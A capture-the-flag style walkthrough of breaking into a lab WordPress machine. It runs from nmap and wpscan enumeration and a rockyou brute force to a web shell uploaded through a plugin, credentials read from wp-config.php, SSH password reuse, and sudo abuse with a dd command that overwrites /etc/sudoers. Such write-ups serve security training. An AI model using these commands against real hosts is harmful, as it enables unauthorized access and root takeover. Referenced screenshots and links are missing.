Scanning the host with nmap –A –T4 –p- 192.168.1.9 –vv

From nmap we can see it’s a WordPress site, so let’s see dirb http://192.168.1.9

Enumerating WordPress with wpscan –url 192.168.1.9 -e u

Then brute force it with rockyou.txt
wpscan –url 192.168.1.9 –U admin –P /root/pass/rockyou.txt

Guess should have started by testing it lol, anyway the password is admin:admin and we got in, now let’s try to upload a shell to the target
We can install new plugins, so i installed the File Manager plugin:

Then i uploaded a shell.php file to the upload directory:

And just like that we got a shell opening the file or viewing it’s info:

We got the flag of the user ck home directory

We can view the conf file of the WordPress in /var/www/html/wp-config.php

i used the password bla_is_my_password to ssh to the host trying the name bla and it worked:

And the user bla can run sudo:

According to THIS site we can abuse it to upload ssh file from our machine to the target:

And as soon as i ssh to it we got in, and we can see the user bla1 can run sudo as well:

sudo –u ck-00 /bin/rbash

Once again according to THIS site again we can sudo using dd command like this:
echo “ck-00 ALL=(ALL) NOPASSWD: ALL” | sudo dd of=/etc/sudoers
Actually it’s easy as all we do is to append the user ck-00 to the sudores file without any passwords:
